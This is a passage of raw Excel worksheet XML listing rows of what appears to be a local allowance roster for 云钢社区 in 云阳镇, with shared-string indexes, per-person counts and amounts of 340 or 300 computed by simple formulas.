        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1733" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1733" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1734" ht="23" customHeight="1" spans="1:11">
      <c r="A1734" s="13" t="s">
        <v>4628</v>
      </c>
      <c r="B1734" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1734" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1734" s="14" t="s">
        <v>4629</v>
      </c>
      <c r="E1734" s="14" t="s">
        <v>4630</v>
      </c>
      <c r="F1734" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1734" s="14">
        <v>1</v>
      </c>
      <c r="H1734" s="14">
        <v>340</v>
      </c>
      <c r="I1734" s="14">
        <f t="shared" si="92"/>
        <v>340</v>
      </c>
      <c r="J1734" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1734" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1735" ht="23" customHeight="1" spans="1:11">
      <c r="A1735" s="13" t="s">
        <v>4631</v>
      </c>
      <c r="B1735" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1735" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1735" s="14" t="s">
        <v>4632</v>
      </c>
      <c r="E1735" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1735" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1735" s="14">
        <v>2</v>
      </c>
      <c r="H1735" s="14">
        <v>300</v>
      </c>
      <c r="I1735" s="14">
        <f t="shared" si="92"/>
        <v>600</v>
      </c>
      <c r="J1735" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1735" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1736" ht="23" customHeight="1" spans="1:11">
      <c r="A1736" s="13" t="s">
        <v>4633</v>
      </c>
      <c r="B1736" s="14" t="str">
        <f>B1735</f>
        <v>云阳镇</v>
      </c>
      <c r="C1736" s="14" t="str">
        <f>C1735</f>
        <v>云钢社区</v>
      </c>
      <c r="D1736" s="46" t="s">
        <v>4634</v>
      </c>
      <c r="E1736" s="27" t="s">
        <v>4635</v>
      </c>
      <c r="F1736" s="14" t="str">
        <f>F1735</f>
        <v>4113210599</v>
      </c>
      <c r="G1736" s="14"/>
      <c r="H1736" s="14"/>
      <c r="I1736" s="14"/>
      <c r="J1736" s="14"/>
      <c r="K1736" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1737" ht="23" customHeight="1" spans="1:11">
      <c r="A1737" s="13" t="s">
        <v>4636</v>
      </c>
      <c r="B1737" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1737" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1737" s="14" t="s">
        <v>4637</v>
      </c>
      <c r="E1737" s="14" t="s">
        <v>4638</v>
      </c>
      <c r="F1737" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1737" s="14">
        <v>1</v>
      </c>
      <c r="H1737" s="14">
        <v>340</v>
      </c>
      <c r="I1737" s="14">
        <f t="shared" ref="I1737:I1746" si="93">H1737*G1737</f>
        <v>340</v>
      </c>
      <c r="J1737" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1737" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1738" ht="23" customHeight="1" spans="1:11">
      <c r="A1738" s="13" t="s">
        <v>4639</v>
      </c>
      <c r="B1738" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1738" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1738" s="14" t="s">
        <v>4640</v>
      </c>
      <c r="E1738" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1738" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1738" s="14">
        <v>1</v>
      </c>
      <c r="H1738" s="14">
        <v>340</v>
      </c>
      <c r="I1738" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1738" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1738" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1739" ht="23" customHeight="1" spans="1:11">
      <c r="A1739" s="13" t="s">
        <v>4641</v>
      </c>
      <c r="B1739" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1739" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1739" s="14" t="s">
        <v>4642</v>
      </c>
      <c r="E1739" s="14" t="s">
        <v>4643</v>
      </c>
      <c r="F1739" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1739" s="14">
        <v>1</v>
      </c>
      <c r="H1739" s="14">
        <v>340</v>
      </c>
      <c r="I1739" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1739" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1739" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1740" ht="23" customHeight="1" spans="1:11">
      <c r="A1740" s="13" t="s">
        <v>4644</v>
      </c>
      <c r="B1740" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1740" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1740" s="14" t="s">
        <v>4645</v>
      </c>
      <c r="E1740" s="14" t="s">
        <v>3616</v>
      </c>
      <c r="F1740" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1740" s="14">
        <v>1</v>
      </c>
      <c r="H1740" s="14">
        <v>340</v>
      </c>
      <c r="I1740" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1740" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1740" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1741" ht="23" customHeight="1" spans="1:11">
      <c r="A1741" s="13" t="s">
        <v>4646</v>
      </c>
      <c r="B1741" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1741" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1741" s="14" t="s">
        <v>4647</v>
      </c>
      <c r="E1741" s="14" t="s">
        <v>3458</v>
      </c>
      <c r="F1741" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1741" s="14">
        <v>1</v>
      </c>
      <c r="H1741" s="14">
        <v>340</v>
      </c>
      <c r="I1741" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1741" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1741" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1742" ht="23" customHeight="1" spans="1:11">
      <c r="A1742" s="13" t="s">
        <v>4648</v>
      </c>
      <c r="B1742" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1742" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1742" s="14" t="s">
        <v>4649</v>
      </c>
      <c r="E1742" s="14" t="s">
        <v>4650</v>
      </c>
      <c r="F1742" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1742" s="14">
        <v>1</v>
      </c>
      <c r="H1742" s="14">
        <v>340</v>
      </c>
      <c r="I1742" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1742" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1742" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1743" ht="23" customHeight="1" spans="1:11">
      <c r="A1743" s="13" t="s">
        <v>4651</v>
      </c>
      <c r="B1743" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1743" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1743" s="14" t="s">
        <v>4652</v>
      </c>
      <c r="E1743" s="14" t="s">
        <v>4653</v>
      </c>
      <c r="F1743" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1743" s="14">
        <v>1</v>
      </c>
      <c r="H1743" s="14">
        <v>340</v>
      </c>
      <c r="I1743" s="14">
        <f t="shared" si="93"/>
        <v>340</v>
      </c>
      <c r="J1743" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1743" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1744" ht="23" customHeight="1" spans="1:11">
      <c r="A1744" s="13" t="s">
        <v>4654</v>
      </c>
      <c r="B1744" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1744" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1744" s="14" t="s">
        <v>4655</v>
      </c>
      <c r="E1744" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1744" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1744" s="14">
        <v>2</v>
      </c>
      <c r="H1744" s="14">
        <v>300</v>
      </c>
      <c r="I1744" s="14">
        <f t="shared" si="93"/>
        <v>600</v>
      </c>
      <c r="J1744" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1744" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1745" ht="23" customHeight="1" spans="1:11">
      <c r="A1745" s="13" t="s">
        <v>4656</v>
      </c>
      <c r="B1745" s="14" t="str">
        <f>B1744</f>
        <v>云阳镇</v>
      </c>
      <c r="C1745" s="14" t="str">
        <f>C1744</f>
        <v>云钢社区</v>
      </c>
      <c r="D1745" s="46" t="s">
        <v>4657</v>
      </c>
      <c r="E1745" s="46" t="s">
        <v>4658</v>
      </c>
      <c r="F1745" s="14" t="str">
        <f>F1744</f>
        <v>4113210599</v>
      </c>
      <c r="G1745" s="14"/>
      <c r="H1745" s="14"/>
      <c r="I1745" s="14"/>
      <c r="J1745" s="14"/>
      <c r="K1745" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1746" ht="23" customHeight="1" spans="1:11">
      <c r="A1746" s="13" t="s">
        <v>4659</v>
      </c>
      <c r="B1746" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1746" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1746" s="14" t="s">
        <v>4660</v>
      </c>
      <c r="E1746" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1746" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1746" s="14">
        <v>1</v>
      </c>
      <c r="H1746" s="14">
        <v>340</v>
      </c>
      <c r="I1746" s="14">
        <f>H1746*G1746</f>
        <v>340</v>
      </c>
      <c r="J1746" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1746" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1747" ht="23" customHeight="1" spans="1:11">
      <c r="A1747" s="13" t="s">
        <v>4661</v>
      </c>
      <c r="B1747" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1747" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1747" s="14" t="s">
        <v>4662</v>
      </c>
      <c r="E1747" s="14" t="s">
        <v>4663</v>
      </c>
      <c r="F1747" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1747" s="14">
        <v>1</v>
      </c>
      <c r="H1747" s="14">
        <v>340</v>
      </c>
      <c r="I1747" s="14">
        <f>H1747*G1747</f>
        <v>340</v>
      </c>
      <c r="J1747" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1747" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1748" ht="23" customHeight="1" spans="1:11">
      <c r="A1748" s="13" t="s">
        <v>4664</v>
      </c>
      <c r="B1748" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1748" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1748" s="14" t="s">
        <v>4665</v>
      </c>
      <c r="E1748" s="14" t="s">
        <v>3636</v>
      </c>
      <c r="F1748" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1748" s="14">
        <v>2</v>
      </c>
      <c r="H1748" s="14">
        <v>300</v>
      </c>
      <c r="I1748" s="14">
        <f>H1748*G1748</f>
        <v>600</v>
      </c>
      <c r="J1748" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1748" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1749" ht="23" customHeight="1" spans="1:11">
      <c r="A1749" s="13" t="s">
        <v>4666</v>
      </c>
      <c r="B1749" s="14" t="str">
        <f>B1748</f>
        <v>云阳镇</v>
      </c>
      <c r="C1749" s="14" t="str">
        <f>C1748</f>
        <v>云钢社区</v>
      </c>
      <c r="D1749" s="27" t="s">
        <v>4667</v>
      </c>
      <c r="E1749" s="27" t="s">
        <v>3869</v>
      </c>
      <c r="F1749" s="14" t="str">
        <f>F1748</f>
        <v>4113210599</v>
      </c>
      <c r="G1749" s="14"/>
      <c r="H1749" s="14"/>
      <c r="I1749" s="14"/>
      <c r="J1749" s="14"/>
      <c r="K1749" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1750" ht="23" customHeight="1" spans="1:11">
      <c r="A1750" s="13" t="s">
        <v>4668</v>
      </c>
      <c r="B1750" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1750" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1750" s="14" t="s">
        <v>4669</v>
      </c>
      <c r="E1750" s="14" t="s">
        <v>2560</v>
      </c>
      <c r="F1750" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1750" s="14">
        <v>1</v>
      </c>
      <c r="H1750" s="14">
        <v>340</v>
      </c>
      <c r="I1750" s="14">
        <f t="shared" ref="I1750:I1756" si="94">H1750*G1750</f>
        <v>340</v>
      </c>
      <c r="J1750" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1750" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1751" ht="23" customHeight="1" spans="1:11">
      <c r="A1751" s="13" t="s">
        <v>4670</v>
      </c>
      <c r="B1751" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1751" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1751" s="14" t="s">
        <v>4671</v>
      </c>
      <c r="E1751" s="14" t="s">
        <v>3636</v>
      </c>
      <c r="F1751" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1751" s="14">
        <v>1</v>
      </c>
      <c r="H1751" s="14">
        <v>340</v>
      </c>
      <c r="I1751" s="14">
        <f t="shared" si="94"/>
        <v>340</v>
      </c>
      <c r="J1751" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1751" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1752" ht="23" customHeight="1" spans="1:11">
      <c r="A1752" s="13" t="s">
        <v>4672</v>
      </c>
      <c r="B1752" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1752" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1752" s="14" t="s">
        <v>4673</v>
      </c>
      <c r="E1752" s="14" t="s">
        <v>3863</v>
      </c>
      <c r="F1752" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1752" s="14">
        <v>1</v>
      </c>
      <c r="H1752" s="14">
        <v>340</v>
      </c>
      <c r="I1752" s="14">
        <f t="shared" si="94"/>
        <v>340</v>
      </c>
      <c r="J1752" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1752" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1753" ht="23" customHeight="1" spans="1:11">
      <c r="A1753" s="13" t="s">
        <v>4674</v>
      </c>
      <c r="B1753" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1753" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1753" s="14" t="s">
        <v>4675</v>
      </c>
      <c r="E1753" s="14" t="s">
        <v>3730</v>
      </c>
      <c r="F1753" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1753" s="14">
        <v>1</v>
      </c>
      <c r="H1753" s="14">
        <v>340</v>
      </c>
      <c r="I1753" s="14">
        <f t="shared" si="94"/>
        <v>340</v>
      </c>
      <c r="J1753" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1753" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1754" ht="23" customHeight="1" spans="1:11">
      <c r="A1754" s="13" t="s">
        <v>4676</v>
      </c>
      <c r="B1754" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1754" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1754" s="14" t="s">
        <v>4677</v>
      </c>
      <c r="E1754" s="14" t="s">
        <v>4021</v>
      </c>
      <c r="F1754" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1754" s="14">
        <v>1</v>
      </c>
      <c r="H1754" s="14">
        <v>340</v>
      </c>
      <c r="I1754" s="14">
        <f t="shared" si="94"/>
        <v>340</v>
      </c>
      <c r="J1754" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1754" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1755" ht="23" customHeight="1" spans="1:11">
      <c r="A1755" s="13" t="s">
        <v>4678</v>
      </c>
      <c r="B1755" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1755" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1755" s="14" t="s">
        <v>4679</v>
      </c>
      <c r="E1755" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1755" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1755" s="14">
        <v>1</v>
      </c>
      <c r="H1755" s="14">
        <v>340</v>
      </c>
      <c r="I1755" s="14">
        <f t="shared" si="94"/>
        <v>340</v>
      </c>
      <c r="J1755" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1755" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1756" ht="23" customHeight="1" spans="1:11">
      <c r="A1756" s="13" t="s">
        <v>4680</v>
      </c>
      <c r="B1756" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1756" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1756" s="14" t="s">
        <v>4681</v>
      </c>
      <c r="E1756" s="14" t="s">
        <v>2923</v>
      </c>
      <c r="F1756" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1756" s="14">
        <v>2</v>
      </c>
      <c r="H1756" s="14">
        <v>300</v>
      </c>
      <c r="I1756" s="14">
        <f t="shared" si="94"/>
        <v>600</v>
      </c>
      <c r="J1756" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1756" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1757" ht="23" customHeight="1" spans="1:11">
      <c r="A1757" s="13" t="s">
        <v>4682</v>
      </c>
      <c r="B1757" s="14" t="str">
        <f>B1756</f>
        <v>云阳镇</v>
      </c>
      <c r="C1757" s="14" t="str">
        <f>C1756</f>
        <v>云钢社区</v>
      </c>
      <c r="D1757" s="27" t="s">
        <v>4683</v>
      </c>
      <c r="E1757" s="27" t="s">
        <v>4533</v>
      </c>
      <c r="F1757" s="14" t="str">
        <f>F1756</f>
        <v>4113210599</v>
      </c>
      <c r="G1757" s="14"/>
      <c r="H1757" s="14"/>
      <c r="I1757" s="14"/>
      <c r="J1757" s="14"/>
      <c r="K1757" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1758" ht="23" customHeight="1" spans="1:11">
      <c r="A1758" s="13" t="s">
        <v>4684</v>
      </c>
      <c r="B1758" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1758" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1758" s="14" t="s">
        <v>4685</v>
      </c>
      <c r="E1758" s="14" t="s">
        <v>4686</v>
      </c>
      <c r="F1758" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1758" s="14">
        <v>1</v>
      </c>
      <c r="H1758" s="14">
        <v>340</v>
      </c>
      <c r="I1758" s="14">
        <f>H1758*G1758</f>
        <v>340</v>
      </c>
      <c r="J1758" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1758" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1759" ht="23" customHeight="1" spans="1:11">
      <c r="A1759" s="13" t="s">
        <v>4687</v>
      </c>
      <c r="B1759" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1759" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1759" s="14" t="s">
        <v>4688</v>
      </c>
      <c r="E1759" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1759" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1759" s="14">
        <v>1</v>
      </c>
      <c r="H1759" s="14">
        <v>340</v>
      </c>
      <c r="I1759" s="14">
        <f>H1759*G1759</f>
        <v>340</v>
      </c>
      <c r="J1759" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1759" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1760" ht="23" customHeight="1" spans="1:11">
      <c r="A1760" s="13" t="s">
        <v>4689</v>
      </c>
      <c r="B1760" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1760" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1760" s="14" t="s">
        <v>4690</v>
      </c>
      <c r="E1760" s="14" t="s">
        <v>4691</v>
      </c>
      <c r="F1760" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1760" s="14">
        <v>1</v>
      </c>
      <c r="H1760" s="14">
        <v>340</v>
      </c>
      <c r="I1760" s="14">
        <f>H1760*G1760</f>
        <v>340</v>
      </c>
      <c r="J1760" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1760" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1761" ht="23" customHeight="1" spans="1:11">
      <c r="A1761" s="13" t="s">
        <v>4692</v>
      </c>
      <c r="B1761" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1761" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1761" s="14" t="s">
        <v>4693</v>
      </c>
      <c r="E1761" s="14" t="s">
        <v>3672</v>
      </c>
      <c r="F1761" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1761" s="14">
        <v>1</v>
      </c>
      <c r="H1761" s="14">
        <v>340</v>
      </c>
      <c r="I1761" s="14">
        <f>H1761*G1761</f>
        <v>340</v>
      </c>
      <c r="J1761" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1761" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1762" ht="23" customHeight="1" spans="1:11">
      <c r="A1762" s="13" t="s">
        <v>4694</v>
      </c>
      <c r="B1762" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1762" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1762" s="14" t="s">
        <v>4695</v>
      </c>
      <c r="E1762" s="14" t="s">
        <v>3356</v>
      </c>
      <c r="F1762" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1762" s="14">
        <v>2</v>
      </c>
      <c r="H1762" s="14">
        <v>300</v>
      </c>
      <c r="I1762" s="14">
        <f>H1762*G1762</f>
        <v>600</v>
      </c>
      <c r="J1762" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1762" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1763" ht="23" customHeight="1" spans="1:11">
      <c r="A1763" s="13" t="s">
        <v>4696</v>
      </c>
      <c r="B1763" s="14" t="str">
        <f>B1762</f>
        <v>云阳镇</v>
      </c>
      <c r="C1763" s="14" t="str">
        <f>C1762</f>
        <v>云钢社区</v>
      </c>
      <c r="D1763" s="27" t="s">
        <v>4697</v>
      </c>
      <c r="E1763" s="27" t="s">
        <v>4698</v>
      </c>
      <c r="F1763" s="14" t="str">
        <f>F1762</f>
        <v>4113210599</v>
      </c>
      <c r="G1763" s="14"/>
      <c r="H1763" s="14"/>
      <c r="I1763" s="14"/>
      <c r="J1763" s="14"/>
      <c r="K1763" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1764" ht="23" customHeight="1" spans="1:11">
      <c r="A1764" s="13" t="s">
        <v>4699</v>
      </c>
      <c r="B1764" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1764" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1764" s="14" t="s">
        <v>4700</v>
      </c>
      <c r="E1764" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1764" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1764" s="14">
        <v>1</v>
      </c>
      <c r="H1764" s="14">
        <v>340</v>
      </c>
      <c r="I1764" s="14">
        <f t="shared" ref="I1764:I1774" si="95">H1764*G1764</f>
        <v>340</v>
      </c>
      <c r="J1764" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1764" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1765" ht="23" customHeight="1" spans="1:11">
      <c r="A1765" s="13" t="s">
        <v>4701</v>
      </c>
      <c r="B1765" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1765" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1765" s="14" t="s">
        <v>4702</v>
      </c>
      <c r="E1765" s="14" t="s">
        <v>4703</v>
      </c>
      <c r="F1765" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1765" s="14">
        <v>1</v>
      </c>
      <c r="H1765" s="14">
        <v>340</v>
      </c>
      <c r="I1765" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1765" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1765" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1766" ht="23" customHeight="1" spans="1:11">
      <c r="A1766" s="13" t="s">
        <v>4704</v>
      </c>
      <c r="B1766" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1766" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1766" s="14" t="s">
        <v>4705</v>
      </c>
      <c r="E1766" s="14" t="s">
        <v>4706</v>
      </c>
      <c r="F1766" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1766" s="14">
        <v>1</v>
      </c>
      <c r="H1766" s="14">
        <v>340</v>
      </c>
      <c r="I1766" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1766" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1766" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1767" ht="23" customHeight="1" spans="1:11">
      <c r="A1767" s="13" t="s">
        <v>4707</v>
      </c>
      <c r="B1767" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1767" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1767" s="14" t="s">
        <v>4708</v>
      </c>
      <c r="E1767" s="14" t="s">
        <v>4709</v>
      </c>
      <c r="F1767" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1767" s="14">
        <v>1</v>
      </c>
      <c r="H1767" s="14">
        <v>340</v>
      </c>
      <c r="I1767" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1767" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1767" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1768" ht="23" customHeight="1" spans="1:11">
      <c r="A1768" s="13" t="s">
        <v>4710</v>
      </c>
      <c r="B1768" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1768" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1768" s="14" t="s">
        <v>4711</v>
      </c>
      <c r="E1768" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1768" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1768" s="14">
        <v>1</v>
      </c>
      <c r="H1768" s="14">
        <v>340</v>
      </c>
      <c r="I1768" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1768" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1768" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1769" ht="23" customHeight="1" spans="1:11">
      <c r="A1769" s="13" t="s">
        <v>4712</v>
      </c>
      <c r="B1769" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1769" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1769" s="14" t="s">
        <v>4713</v>
      </c>
      <c r="E1769" s="14" t="s">
        <v>428</v>
      </c>
      <c r="F1769" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1769" s="14">
        <v>1</v>
      </c>
      <c r="H1769" s="14">
        <v>340</v>
      </c>
      <c r="I1769" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1769" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1769" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1770" ht="23" customHeight="1" spans="1:11">
      <c r="A1770" s="13" t="s">
        <v>4714</v>
      </c>
      <c r="B1770" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1770" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1770" s="14" t="s">
        <v>4715</v>
      </c>
      <c r="E1770" s="14" t="s">
        <v>4716</v>
      </c>
      <c r="F1770" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1770" s="14">
        <v>1</v>
      </c>
      <c r="H1770" s="14">
        <v>340</v>
      </c>
      <c r="I1770" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1770" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1770" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1771" ht="23" customHeight="1" spans="1:11">
      <c r="A1771" s="13" t="s">
        <v>4717</v>
      </c>
      <c r="B1771" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1771" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1771" s="14" t="s">
        <v>4718</v>
      </c>
      <c r="E1771" s="14" t="s">
        <v>3805</v>
      </c>
      <c r="F1771" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1771" s="14">
        <v>1</v>
      </c>
      <c r="H1771" s="14">
        <v>340</v>
      </c>
      <c r="I1771" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1771" s="14" t="s">
        <v>4320</v>
      </c>
